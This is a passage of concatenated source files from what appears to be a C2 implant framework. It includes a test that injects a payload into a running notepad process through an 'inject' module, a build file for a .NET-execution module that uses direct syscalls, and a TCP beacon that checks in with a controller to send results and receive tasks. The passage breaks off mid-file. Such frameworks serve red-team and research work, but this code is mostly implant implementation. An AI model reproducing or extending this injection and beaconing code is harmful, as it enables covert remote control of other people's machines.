20 | std::cout << "[-] Failed" << std::endl; 21 | 22 | return 0; 23 | } 24 | 25 | bool testInject() 26 | { 27 | std::unique_ptr inject = std::make_unique(); 28 | std::string shellCodeFile; 29 | 30 | { 31 | #ifdef _WIN32 32 | shellCodeFile="C:\\Windows\\System32\\calc.exe"; 33 | 34 | int pid = launchProcess("C:\\Windows\\System32\\notepad.exe"); 35 | std::cout << "notepad pid " << pid << std::endl; 36 | 37 | std::vector splitedCmd; 38 | splitedCmd.push_back("inject"); 39 | splitedCmd.push_back("-e"); 40 | splitedCmd.push_back(shellCodeFile); 41 | splitedCmd.push_back(std::to_string(pid)); 42 | 43 | C2Message c2Message; 44 | C2Message c2RetMessage; 45 | inject->init(splitedCmd, c2Message); 46 | inject->process(c2Message, c2RetMessage); 47 | 48 | std::string output = "\n\noutput:\n"; 49 | output += c2RetMessage.returnvalue(); 50 | output += "\n"; 51 | std::cout << output << std::endl; 52 | 53 | HANDLE hProc = OpenProcess(PROCESS_TERMINATE, FALSE, pid); 54 | if (hProc) { 55 | TerminateProcess(hProc, 0); 56 | CloseHandle(hProc); 57 | } 58 | #endif 59 | } 60 | 61 | return true; 62 | } 63 | -------------------------------------------------------------------------------- /modules/DotnetExec/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | if(WIN32) 3 | add_library(DotnetExec SHARED DotnetExec.cpp HostControl.cpp AssemblyManager.cpp AssemblyStore.cpp HostMalloc.cpp MemoryManager.cpp ../ModuleCmd/syscall.cpp ../ModuleCmd/syscall.x64.obj ) 4 | else() 5 | add_library(DotnetExec SHARED DotnetExec.cpp) 6 | endif() 7 | set_property(TARGET DotnetExec PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 8 | target_link_libraries(DotnetExec ) 9 | add_custom_command(TARGET DotnetExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 10 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 11 | 12 | if(C2CORE_BUILD_TESTS) 13 | if(WIN32) 14 | add_executable(testsDotnetExec tests/testsDotnetExec.cpp DotnetExec.cpp HostControl.cpp AssemblyManager.cpp AssemblyStore.cpp HostMalloc.cpp MemoryManager.cpp ../ModuleCmd/syscall.cpp ../ModuleCmd/syscall.x64.obj tests/project.rc) 15 | else() 16 | add_executable(testsDotnetExec tests/testsDotnetExec.cpp DotnetExec.cpp) 17 | endif() 18 | # add_executable(testsDotnetExec WIN32 tests/testsDotnetExec.cpp DotnetExec.cpp HostControl.cpp AssemblyManager.cpp AssemblyStore.cpp HostMalloc.cpp MemoryManager.cpp ../ModuleCmd/syscall.cpp ../ModuleCmd/syscall.x64.obj tests/project.rc) 19 | target_link_libraries(testsDotnetExec ) 20 | set_property(TARGET testsDotnetExec PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 21 | add_custom_command(TARGET testsDotnetExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 22 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 23 | 24 | add_test(NAME testsDotnetExec COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 25 | endif() -------------------------------------------------------------------------------- /beacon/BeaconTcp.cpp: -------------------------------------------------------------------------------- 1 | #include "BeaconTcp.hpp" 2 | #include 3 | 4 | using namespace std; 5 | 6 | 7 | BeaconTcp::BeaconTcp(std::string& config, std::string& ip, int port) 8 | : Beacon() 9 | { 10 | m_ip = ip; 11 | m_port = port; 12 | 13 | // beacon and modules config 14 | initConfig(config); 15 | 16 | m_client=new SocketTunnelClient(); 17 | } 18 | 19 | 20 | BeaconTcp::~BeaconTcp() 21 | { 22 | delete m_client; 23 | } 24 | 25 | 26 | int BeaconTcp::splitInPacket(const std::string& input, std::vector& output) 27 | { 28 | std::string delimiter = ""; 29 | size_t pos = 0; 30 | size_t start = 0; 31 | 32 | while ((pos = input.find(delimiter, start)) != std::string::npos) { 33 | output.push_back(input.substr(start, pos - start)); 34 | start = pos + delimiter.length(); 35 | } 36 | 37 | if (start < input.length()) 38 | { 39 | output.push_back(input.substr(start)); 40 | } 41 | 42 | return output.size(); 43 | } 44 | 45 | 46 | void BeaconTcp::checkIn() 47 | { 48 | int ret = m_client->init(m_ip, m_port); 49 | 50 | if(ret) 51 | { 52 | std::string output; 53 | taskResultsToCmd(output); 54 | 55 | output.append(""); 56 | 57 | std::string input; 58 | int res = m_client->process(output, input); 59 | 60 | if(res<0) 61 | { 62 | m_client->reset(); 63 | } 64 | else if(!input.empty()) 65 | { 66 | std::vector trames; 67 | splitInPacket(input, trames); 68 | 69 | for(int i=0; i 6 | #endif 7 | 8 | bool testScript(); 9 | 10 | int main() 11 | { 12 | bool res; 13 | 14 | std::cout << "[+] testScript" << std::endl; 15 | res = testScript(); 16 | if (res) 17 | std::cout << "[+] Sucess" << std::endl; 18 | else 19 | std::cout << "[-] Failed" << std::endl; 20 | 21 | return 0; 22 | } 23 | 24 | bool testScript() 25 | { 26 | std::unique_ptr